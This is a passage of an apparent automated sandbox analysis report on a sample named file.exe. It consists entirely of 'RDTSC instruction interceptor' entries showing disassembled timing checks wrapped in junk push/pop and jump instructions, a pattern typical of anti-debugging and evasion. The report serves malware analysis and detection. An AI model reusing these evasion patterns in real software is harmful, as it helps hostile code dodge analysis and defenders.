                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABAA8C second address: ABAA90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABAA90 second address: ABAAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0BF8E3D572h 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABAAAF second address: ABAACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0BF9145130h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB181 second address: ABB185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB185 second address: ABB1B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145137h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007F0BF9145126h 0x00000014 jnc 00007F0BF9145126h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB340 second address: ABB344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB344 second address: ABB363 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145136h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB363 second address: ABB36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB83B second address: ABB862 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0BF9145139h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F0BF9145126h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB862 second address: ABB866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA09B second address: ABA0D3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F0BF9145126h 0x00000009 jmp 00007F0BF9145131h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0BF9145136h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA0D3 second address: ABA0D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABEC91 second address: ABECC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jno 00007F0BF9145134h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0BF9145135h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC227A second address: AC2294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D576h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC2294 second address: AC22BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 je 00007F0BF9145126h 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 jmp 00007F0BF9145136h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC22BF second address: AC22D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D56Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC22D4 second address: AC22DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC22DA second address: AC22DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7ACC second address: AC7AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145134h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6AE3 second address: AC6AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D573h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6EED second address: AC6EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6EF3 second address: AC6EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7148 second address: AC7151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7151 second address: AC7155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7155 second address: AC7162 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0BF9145126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7459 second address: AC7479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0BF8E3D576h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC77B9 second address: AC77D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F0BF9145126h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F0BF914512Fh 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC77D8 second address: AC77E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F0BF8E3D566h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC77E4 second address: AC77EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACBB61 second address: ACBB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 jmp 00007F0BF8E3D56Eh 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB6BE second address: ACB6CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F0BF9145126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB6CA second address: ACB6E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0BF8E3D570h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB6E0 second address: ACB6F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF914512Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB6F2 second address: ACB72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F0BF8E3D58Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jo 00007F0BF8E3D56Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE7F5 second address: ACE7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE7FA second address: ACE800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACEB29 second address: ACEB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD359B second address: AD359F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD38BB second address: AD38C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7288 second address: AD728D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD73E7 second address: AD73EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD73EB second address: AD73F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD76EC second address: AD76F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD9AA second address: ADD9C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jp 00007F0BF8E3D578h 0x0000000b jo 00007F0BF8E3D572h 0x00000011 jg 00007F0BF8E3D566h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC2BA second address: ADC2CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F0BF9145126h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC2CB second address: ADC2D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC581 second address: ADC587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC587 second address: ADC5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D579h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC809 second address: ADC80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC80D second address: ADC813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC813 second address: ADC81D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0BF9145126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC81D second address: ADC821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC821 second address: ADC827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81D55 second address: A81DBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0BF8E3D571h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 jp 00007F0BF8E3D568h 0x00000016 mov ebx, dword ptr [ebp+12472E76h] 0x0000001c mov dword ptr [ebp+122D2D9Ch], esi 0x00000022 add eax, ebx 0x00000024 mov ecx, dword ptr [ebp+122D1D24h] 0x0000002a push eax 0x0000002b jmp 00007F0BF8E3D56Dh 0x00000030 mov dword ptr [esp], eax 0x00000033 mov edx, dword ptr [ebp+122D27DCh] 0x00000039 push 00000004h 0x0000003b nop 0x0000003c push ebx 0x0000003d jmp 00007F0BF8E3D56Dh 0x00000042 pop ebx 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push edi 0x00000049 pop edi 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81DBD second address: A81DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81DC1 second address: A81DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADCC22 second address: ADCC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADCC26 second address: ADCC4E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0BF8E3D566h 0x00000008 jmp 00007F0BF8E3D573h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jg 00007F0BF8E3D566h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADCC4E second address: ADCC71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F0BF9145136h 0x0000000b jmp 00007F0BF9145130h 0x00000010 jnp 00007F0BF9145132h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADCC71 second address: ADCC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD6BB second address: ADD6C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD6C1 second address: ADD6C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47FAE second address: A47FBA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jng 00007F0BF9145126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3431 second address: AE3435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3EFD second address: AE3F01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3F01 second address: AE3F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c jmp 00007F0BF8E3D573h 0x00000011 popad 0x00000012 push ebx 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE41E4 second address: AE41E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE44C3 second address: AE44C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4787 second address: AE478B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8FBD second address: AE8FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F0BF8E3D56Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE943E second address: AE9444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9444 second address: AE947B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 jmp 00007F0BF8E3D579h 0x0000000c jc 00007F0BF8E3D566h 0x00000012 jl 00007F0BF8E3D566h 0x00000018 popad 0x00000019 ja 00007F0BF8E3D56Eh 0x0000001f push esi 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE95BE second address: AE95D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF914512Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE99D8 second address: AE99DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE99DD second address: AE99F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145130h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE805 second address: AEE80C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEFE0A second address: AEFE16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0BF9145126h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8A13 second address: AF8A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D56Ah 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8A22 second address: AF8A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BF914512Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8A31 second address: AF8A5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D56Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0BF8E3D577h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF6AB5 second address: AF6AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF9145138h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF70B5 second address: AF70D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jno 00007F0BF8E3D56Eh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0BF8E3D56Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF70D7 second address: AF70DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF70DC second address: AF70E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF70E5 second address: AF70E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7387 second address: AF738D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF738D second address: AF73AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0BF9145133h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF73AB second address: AF73AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF77B1 second address: AF77B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7964 second address: AF7974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D56Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7974 second address: AF79AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007F0BF9145126h 0x0000000e jo 00007F0BF9145126h 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 jmp 00007F0BF9145135h 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 je 00007F0BF9145126h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF79AC second address: AF79B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF883A second address: AF8859 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0BF9145126h 0x00000008 jmp 00007F0BF9145135h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8859 second address: AF8862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFF48B second address: AFF4A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF914512Eh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A499B5 second address: A499BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEE95 second address: AFEECF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0BF9145126h 0x00000008 jmp 00007F0BF914512Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnl 00007F0BF9145128h 0x00000015 jmp 00007F0BF9145137h 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEECF second address: AFEED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEED5 second address: AFEEDF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0BF9145126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
